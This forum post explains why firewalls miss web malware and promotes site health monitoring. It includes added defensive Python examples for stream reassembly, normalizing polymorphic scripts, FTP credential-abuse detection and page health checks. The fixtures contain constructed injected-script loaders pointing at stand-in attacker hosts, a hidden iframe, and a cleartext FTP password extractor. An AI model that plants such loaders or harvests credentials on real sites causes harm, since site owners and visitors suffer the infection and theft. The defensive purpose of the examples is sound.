

Administrator
Web-Malware: Headache for Firewalls
« on: August 23, 2013, 03:08:09 PM »

What is a Firewall?:

A firewall is a piece of software (or a dedicated appliance running that software) deployed on servers, personal computers, OEM boxes and network appliances. Its primary job is to inspect the incoming, and sometimes the outgoing, traffic of a network, host, appliance or other network element, and to enforce a set of rules that raise an organization's security level. Typical rules are "do not allow incoming traffic to a particular port" or "do not allow access to a service (such as HTTP) from a group of IP addresses".

Are Firewalls any good?:

Yes, many commercial and open-source firewalls are very good at their job. It is a popular misconception, however, that putting a firewall in front of a server lets the owner of the infrastructure or services behind it sleep soundly. To an extent that is true. But with the current spate of polymorphic web malware traversing the Internet, it is nearly impossible for traditional anti-virus companies and most firewall vendors to keep up with the changing tactics of malicious hackers. Consider the case that in the last year alone, has documented a 100% increase in the incidents of web-based malware affecting various websites, hosters and e-businesses than the previous year. This points clearly to malware authors constantly changing their techniques to infect more and more systems: more than 6,600 new websites are infected with malware every single day.

When are firewalls not effective?:

To cut to the chase, firewalls are not effective in three scenarios (for incoming data):

(1) When a firewall cannot inspect enough of the incoming data to decide whether a stream is malicious

(2) When a firewall cannot determine the safety of incoming data no matter how much of it is inspected

(3) When a firewall does not see the incoming data at all

For case (1), malware authors have constantly tried to split a malicious payload across packets so that each packet on its own looks benign, hoping to slip past stateless and even stateful firewalls. Modern firewalls that reassemble the stream before inspecting it are actually pretty good at catching this, albeit at the cost of complexity, memory and CPU load (and the reassembly buffers themselves become a target for resource exhaustion, so they must be bounded). For the purposes of this discussion we shall assume these tradeoffs do not pose a problem.
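To make case (1) concrete, here is an added Python example (not from the original post): a constructed signature is split across two TCP-style segments so that a per-packet matcher misses it, while a matcher that reassembles the stream, including out-of-order segments, catches it. The signature string, the page payload, the cut point and the buffer limit are all constructed for illustration.

```python
"""Per-packet inspection vs. stream reassembly (added example).

A constructed signature is split across TCP-style segments so that no single
segment contains it. stateless_match() looks at each segment alone and misses
it; StreamReassembler keeps per-connection state and catches it, even when
the segments arrive out of order.
"""
from dataclasses import dataclass
from typing import Dict, Iterable, List, Tuple

# Constructed signature: a marker typical of obfuscated injected JavaScript.
SIGNATURE = b"eval(unescape("


@dataclass
class Segment:
    seq: int        # byte offset of this segment within the stream
    payload: bytes


def split_at(data: bytes, cut_points: List[int]) -> List[Segment]:
    """Cut the stream at the given byte offsets (attacker-chosen boundaries)."""
    segments, start = [], 0
    for cut in sorted(cut_points) + [len(data)]:
        segments.append(Segment(seq=start, payload=data[start:cut]))
        start = cut
    return segments


def stateless_match(segments: Iterable[Segment]) -> bool:
    """Inspect every segment on its own; nothing is remembered between them."""
    return any(SIGNATURE in seg.payload for seg in segments)


class StreamReassembler:
    """Minimal in-order reassembly: the per-connection state a stateful
    firewall or IPS must keep. The out-of-order buffer is bounded because
    segments that never complete a stream are a classic way to exhaust it."""

    def __init__(self, max_pending: int = 64 * 1024) -> None:
        self.expected = 0                       # next in-order byte offset
        self.pending: Dict[int, bytes] = {}     # out-of-order segments by seq
        self.tail = b""                         # last len(SIGNATURE)-1 bytes delivered
        self.max_pending = max_pending
        self.matched = False

    def feed(self, seg: Segment) -> bool:
        """Accept one segment; return True once the signature has been seen
        anywhere in the reassembled byte stream."""
        if seg.seq >= self.expected:            # ignore retransmits of old data
            self.pending[seg.seq] = seg.payload
        if sum(len(p) for p in self.pending.values()) > self.max_pending:
            raise MemoryError("reassembly buffer exhausted")
        while self.expected in self.pending:
            chunk = self.pending.pop(self.expected)
            window = self.tail + chunk          # overlap catches a split signature
            if SIGNATURE in window:
                self.matched = True
            self.tail = window[-(len(SIGNATURE) - 1):]
            self.expected += len(chunk)
        return self.matched


def detect_with_reassembly(segments: Iterable[Segment]) -> bool:
    reassembler = StreamReassembler()
    return any(reassembler.feed(seg) for seg in segments)


def demo() -> Tuple[bool, bool, bool]:
    """Constructed page with the signature split as 'eval(' | 'unescape('."""
    page = b"<html><script>" + SIGNATURE + b"'%61%6C%65%72%74%28%31%29')</script></html>"
    segments = split_at(page, [page.index(SIGNATURE) + 5])
    in_order = detect_with_reassembly(segments)
    out_of_order = detect_with_reassembly(list(reversed(segments)))
    return stateless_match(segments), in_order, out_of_order


if __name__ == "__main__":
    print(demo())   # (False, True, True)
```

The reassembler keeps only the last few bytes of delivered data plus the out-of-order backlog, which is what makes the state affordable; the MemoryError path is where a real device has to decide whether to drop the connection or fail open, and failing open is the attacker's goal in case (1).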

For case (2), malware authors use readily available toolkits to generate polymorphic code; simply put, these toolkits generate millions of different variants of one basic piece of malware. Every variant has a different byte pattern and a different hash even though it does exactly the same thing, which makes it very hard to detect. This is where traditional anti-virus companies bite the dust. Consider for example, sees more than 200,000 samples of web-based malware on an average day.

Many traditional vendors still rely on the old approach of computing hashes and signatures of malware after a human expert has analyzed a sample. This does not scale. It is extremely hard for firewall manufacturers to keep churning out new signatures and pushing them to their entire client base, and a signature can only be written after the sample has been seen, so a signature/hash-based approach will always lag (in time) behind the attacks themselves. What is needed is a proactive, intelligent way to recognize never-before-seen attacks. Fortunately, machine-learning techniques may prove to be the answer.
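The following added Python example (not from the original post) illustrates the point of the last two paragraphs. A constructed toolkit-style generator emits variants of one loader; every variant has a different SHA-256, so a hash database built from the one sample an analyst saw matches nothing, while a normalization step (strip comments and whitespace, decode %XX escapes, rename identifiers canonically) folds all variants back into one structural signature. The loader template, the variant generator and the keyword list are constructed assumptions, and the normalizer is a tokenizer, not a full JavaScript parser.

```python
"""Hash signatures vs. a normalized structural signature (added example).

make_variant() emulates a polymorphism toolkit: every run of the same loader
gets fresh identifier names, a differently %XX-encoded URL, different
whitespace and junk comments. sha256() differs for each variant, so a hash
database built from the one sample an analyst saw matches nothing, while
normalize() folds all variants back into one canonical form.
"""
import hashlib
import random
import re
from typing import Iterable, Set, Tuple

# Constructed template of an injected remote-script loader (RFC 2606 host).
TEMPLATE = ("var {A} = '{URL}'; var {B} = document.createElement('script'); "
            "{B}.src = unescape({A}); document.body.appendChild({B});")
URL = "http://example.invalid/x.js"

# Names the normalizer keeps literally so the canonical form stays readable;
# everything else is renamed in order of first appearance.
KEYWORDS = {"var", "function", "return", "eval", "unescape", "document",
            "window", "body", "src", "createElement", "appendChild"}

TOKEN = re.compile(
    r"/\*.*?\*/"                  # block comment
    r"|\s+"                       # whitespace
    r"|'(?:[^'\\]|\\.)*'"         # single-quoted string
    r"|\"(?:[^\"\\]|\\.)*\""      # double-quoted string
    r"|[A-Za-z_$][\w$]*"          # identifier or keyword
    r"|\d+"                       # number
    r"|.",                        # any other single character
    re.S)


def make_variant(rng: random.Random) -> str:
    """One toolkit-style variant; behaviour is identical for every variant."""
    def ident() -> str:
        return "".join(rng.choice("abcdefghijklmnopqrstuvwxyz") for _ in range(6))
    a = ident()
    b = ident()
    while b == a:
        b = ident()
    url = "".join(f"%{ord(c):02X}" if rng.random() < 0.3 else c for c in URL)
    js = TEMPLATE.format(A=a, B=b, URL=url)
    js = "".join(rng.choice([" ", "  ", "\n", "\t"]) if c == " " else c for c in js)
    return js.replace(";", rng.choice([";", "; /* " + ident() + " */"]))


def normalize(js: str) -> str:
    """Strip comments/whitespace, decode %XX in strings, rename identifiers."""
    names, out = {}, []
    for m in TOKEN.finditer(js):
        tok = m.group(0)
        if tok.startswith("/*") or tok.isspace():
            continue
        if tok[0] in "'\"":
            body = re.sub(r"%([0-9A-Fa-f]{2})",
                          lambda x: chr(int(x.group(1), 16)), tok[1:-1])
            out.append("'" + body + "'")
        elif re.match(r"[A-Za-z_$]", tok) and tok not in KEYWORDS:
            out.append(names.setdefault(tok, f"v{len(names)}"))
        else:
            out.append(tok)
    return " ".join(out)


def sha256(text: str) -> str:
    return hashlib.sha256(text.encode()).hexdigest()


def hash_hits(variants: Iterable[str], known_hashes: Set[str]) -> int:
    """How many variants an exact-hash database recognizes."""
    return sum(sha256(v) in known_hashes for v in variants)


def structural_hits(variants: Iterable[str], known_forms: Set[str]) -> int:
    """How many variants a database of normalized forms recognizes."""
    return sum(normalize(v) in known_forms for v in variants)


def demo(n: int = 20) -> Tuple[int, int, int]:
    """One analysed sample (seed 0) versus n fresh variants."""
    analysed = make_variant(random.Random(0))
    variants = [make_variant(random.Random(i)) for i in range(1, n + 1)]
    return (hash_hits(variants, {sha256(analysed)}),
            structural_hits(variants, {normalize(analysed)}), n)


if __name__ == "__main__":
    print(demo())   # (0, 20, 20)
```

Normalization is only a step up from hashing: a toolkit that also reorders statements or splits the string literal defeats this particular canonical form, which is the reason the post argues for classifiers that learn features of behaviour rather than of bytes.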

For case (3), the firewall must be forgiven for not catching bad incoming data, since it never sees it. We have observed an uptick in "passive credential sniffing trojans". This kind of malware installs itself on the end customer's own computer and sniffs for cleartext credentials, such as FTP passwords. Once the login credentials are captured, they are passed to automated bots over IRC channels or free webmail accounts. The bots use the credentials to log into the customer's hosting account and proceed to infect everything in it. Many of these attacks succeed because hosters, for various reasons, do not pass FTP/SCP traffic through their firewalls, and even where they do, a login with a valid (stolen) password is indistinguishable from the customer's own.
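As an added Python example (not from the original post), here are the two halves of case (3): what a passive sniffer extracts from a cleartext FTP control channel, and a server-side check the hoster can run for the credential reuse that follows, since the firewall has nothing to go on. The captured exchange and the server log are constructed (RFC 5737 documentation addresses), the log format is a simplified one assumed here rather than any particular FTP daemon's, and the "first IP seen" baseline is a deliberately crude stand-in for a real per-account history.

```python
"""Cleartext FTP: what a passive credential sniffer sees, and a server-side
check for the credential reuse that follows (added example).

The control-channel capture and the server log are constructed, using
RFC 5737 documentation addresses; the log format is a simplified one
assumed here, not that of any particular FTP daemon.
"""
import re
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# Constructed FTP control-channel exchange, as it travels on TCP port 21.
CAPTURE = (b"220 ftp.example.invalid FTP server ready\r\n"
           b"USER webadmin\r\n"
           b"331 Password required for webadmin\r\n"
           b"PASS Summ3r!2013\r\n"
           b"230 User webadmin logged in\r\n"
           b"CWD /public_html\r\n")


def sniff_ftp_credentials(stream: bytes) -> List[Tuple[str, str]]:
    """Pair USER and PASS commands in order of appearance. There is nothing
    to decrypt: RFC 959 FTP sends both in the clear."""
    creds, user = [], None
    for line in stream.split(b"\r\n"):
        cmd, _, arg = line.decode("latin-1").partition(" ")
        if cmd.upper() == "USER":
            user = arg
        elif cmd.upper() == "PASS" and user is not None:
            creds.append((user, arg))
            user = None
    return creds


# Constructed, simplified server log: "<ISO time> <EVENT> user=<u> ip=<ip> [path=<p>]".
LOG = """\
2013-08-23T09:00:00 LOGIN user=webadmin ip=203.0.113.5
2013-08-23T09:01:10 STOR user=webadmin ip=203.0.113.5 path=/public_html/news.html
2013-08-23T09:40:00 LOGIN user=webadmin ip=198.51.100.77
2013-08-23T09:40:03 STOR user=webadmin ip=198.51.100.77 path=/public_html/index.php
2013-08-23T09:40:04 STOR user=webadmin ip=198.51.100.77 path=/public_html/blog/index.php
2013-08-23T09:40:05 STOR user=webadmin ip=198.51.100.77 path=/public_html/js/main.js
2013-08-23T09:40:06 STOR user=webadmin ip=198.51.100.77 path=/public_html/shop/index.php
2013-08-23T11:00:00 LOGIN user=shop ip=203.0.113.9
2013-08-23T11:02:00 STOR user=shop ip=203.0.113.9 path=/public_html/catalog.html
"""

LINE = re.compile(r"^(?P<ts>\S+) (?P<event>\w+) user=(?P<user>\S+) ip=(?P<ip>\S+)"
                  r"(?: path=(?P<path>\S+))?$")
WEB_EXT = (".php", ".html", ".htm", ".js")


def find_credential_abuse(log: str, window: timedelta = timedelta(hours=1),
                          min_uploads: int = 3) -> List[Dict]:
    """Flag an account when a login from an IP other than the one first seen
    for that account is followed, within `window`, by at least `min_uploads`
    uploads of executable web content. The login itself is valid, which is
    exactly why a firewall cannot make this call."""
    first_ip: Dict[str, str] = {}
    suspect: Dict[Tuple[str, str], dict] = {}
    alerts: List[Dict] = []
    for raw in log.splitlines():
        m = LINE.match(raw)
        if not m:
            continue
        ts, user, ip = datetime.fromisoformat(m["ts"]), m["user"], m["ip"]
        if m["event"] == "LOGIN":
            if user not in first_ip:
                first_ip[user] = ip            # crude baseline, assumed for the example
            elif ip != first_ip[user]:
                suspect[(user, ip)] = {"start": ts, "uploads": []}
        elif m["event"] == "STOR" and (user, ip) in suspect:
            s = suspect[(user, ip)]
            if ts - s["start"] <= window and m["path"].lower().endswith(WEB_EXT):
                s["uploads"].append(m["path"])
                if len(s["uploads"]) == min_uploads:   # alert once, at the threshold
                    alerts.append({"user": user, "ip": ip,
                                   "since": s["start"].isoformat(),
                                   "uploads": list(s["uploads"])})
    return alerts


if __name__ == "__main__":
    print(sniff_ftp_credentials(CAPTURE))
    for alert in find_credential_abuse(LOG):
        print(alert)
```

The sniffing half is the argument for SFTP or FTPS over plain FTP; the detection half is the argument for looking at the account's own behaviour (new source address followed by a burst of writes to .php/.js/.html files) rather than at the packets, because to the firewall the bot's session is a normal login.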

What can you do to increase security?:

As a hoster, you can keep your customers' websites safer by taking advantage of the new, emerging website "health monitoring" services. This technology, based on machine learning and self-learning mechanisms, scans websites with minimal interruption, is entirely SaaS based and aims to catch never-before-seen malware, a significant break from the way most traditional anti-virus software works. Keep in mind that firewalls are important, but they are not enough: customer sites can get infected in spite of having a firewall. Rolled into 24x7x365 monitoring, these technologies can detect in near real time when a customer site gets infected.
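To show what the cheapest form of such a health check actually looks at, here is an added Python example (not from the original post, and not any vendor's product): a page is compared against a known-good baseline, and resources that were not there before and either point off-site or are styled to be invisible are reported. Both HTML documents, the site host and the allow-list are constructed assumptions.

```python
"""Website health check against a known-good baseline (added example).

Flags script/iframe/object/embed resources that were not in the baseline
and either point to a host outside the allow-list or are hidden iframes,
the two most common shapes of injected web malware. Both documents, the
site host and the allow-list are constructed for the example.
"""
from html.parser import HTMLParser
from typing import Dict, List, Tuple
from urllib.parse import urlparse

SITE_HOST = "www.example.invalid"                      # assumed monitored site
ALLOWED_HOSTS = {SITE_HOST, "cdn.example.invalid"}     # assumed allow-list

BASELINE_HTML = """<html><head><script src="/js/app.js"></script></head>
<body><h1>Welcome</h1><iframe src="https://cdn.example.invalid/widget"></iframe></body></html>"""

# Constructed 'infected' copy: the same page plus an injected hidden iframe
# and a loader that pulls a script from an unrelated host.
INFECTED_HTML = BASELINE_HTML.replace(
    "</body>",
    '<iframe src="http://evil.example.invalid/in.php" '
    'style="display:none;width:1px;height:1px"></iframe>'
    '<script src="http://203.0.113.66/l.js"></script></body>')


class ResourceCollector(HTMLParser):
    """Collect (tag, url, attributes) for every tag that loads active content."""
    RESOURCE_TAGS = {"script", "iframe", "object", "embed"}

    def __init__(self) -> None:
        super().__init__()
        self.resources: List[Tuple[str, str, Dict[str, str]]] = []

    def handle_starttag(self, tag, attrs):
        if tag in self.RESOURCE_TAGS:
            a = {k: (v or "") for k, v in attrs}
            src = a.get("src") or a.get("data")
            if src:
                self.resources.append((tag, src, a))


def collect(html: str) -> List[Tuple[str, str, Dict[str, str]]]:
    parser = ResourceCollector()
    parser.feed(html)
    return parser.resources


def is_offsite(src: str) -> bool:
    """Relative URLs stay on the site; absolute ones must be on the allow-list."""
    host = urlparse(src).hostname
    return host is not None and host not in ALLOWED_HOSTS


def is_hidden(attrs: Dict[str, str]) -> bool:
    style = attrs.get("style", "").replace(" ", "").lower()
    tiny = {"0", "1", "0px", "1px"}
    return ("display:none" in style or "visibility:hidden" in style
            or attrs.get("width") in tiny or attrs.get("height") in tiny)


def check_health(baseline: str, current: str) -> List[str]:
    """Report resources new since the baseline that look like an injection."""
    known = {(tag, src) for tag, src, _ in collect(baseline)}
    findings = []
    for tag, src, attrs in collect(current):
        if (tag, src) in known:
            continue
        reasons = []
        if is_offsite(src):
            reasons.append("off-site")
        if tag == "iframe" and is_hidden(attrs):
            reasons.append("hidden")
        if reasons:
            findings.append(f"{tag} {src} ({', '.join(reasons)})")
    return findings


if __name__ == "__main__":
    for finding in check_health(BASELINE_HTML, INFECTED_HTML):
        print(finding)
```

A baseline diff is only as good as the baseline: every legitimate deploy that adds a third-party script shows up as a finding until the baseline is refreshed, and obfuscated inline scripts with no src attribute pass this check entirely, which is the gap the learning-based classifiers in the post are meant to close.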

Emerging technology such as on-demand web scanning can also help hosting companies identify rogue websites on their networks, protecting their reputation. It can turn into a golden opportunity to increase recurring revenue and to differentiate oneself from the competition.